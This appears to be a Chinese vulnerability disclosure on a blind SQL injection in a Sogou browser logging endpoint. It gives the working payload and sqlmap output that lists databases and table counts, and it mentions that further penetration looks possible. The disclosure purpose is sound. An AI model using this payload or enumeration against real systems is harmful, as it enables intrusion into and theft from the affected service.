搜狗某应用SQL注入漏洞,有一个库中有近2亿条MD5,不知道是什么东西..
安装最新版本的"搜狗高速浏览器",打开后使用Burp抓包,发现浏览器对如下地址发起了一次HTTP请求:
http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
其中,md5参数存在布尔型盲注。
--count了一下发现nagios的库,应该是可以进一步渗透的。p4p库中有近两亿条MD5,不知道是什么东西..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: md5
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url=http://se.cdn.sogou.com/apk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742' AND 6498=6498 AND 'KOBd'='KOBd&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
---
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [10]:
[*] geoip
[*] information_schema
[*] ipmap
[*] mysql
[*] nagios
[*] p4p
[*] proxyservers
[*] pxpadmin
[*] server_status
[*] test
Database: geoip
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ip | 77947 |
| cc | 233 |
+---------------------------------------+---------+
Database: nagios
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| nagios_hostchecks | 209759 |
| nagios_timedevents | 55842 |
| nagios_servicechecks | 55703 |
| nagios_logentries | 4999 |
| nagios_systemcommands | 3623 |
| nagios_statehistory | 1248 |
| nagios_host_contacts | 732 |
| nagios_objects | 228 |
| nagios_contact_notificationcommands | 216 |
| nagios_timedeventqueue | 126 |
| nagios_hoststatus | 122 |
| nagios_service_contacts | 116 |
| nagios_configfilevariables | 97 |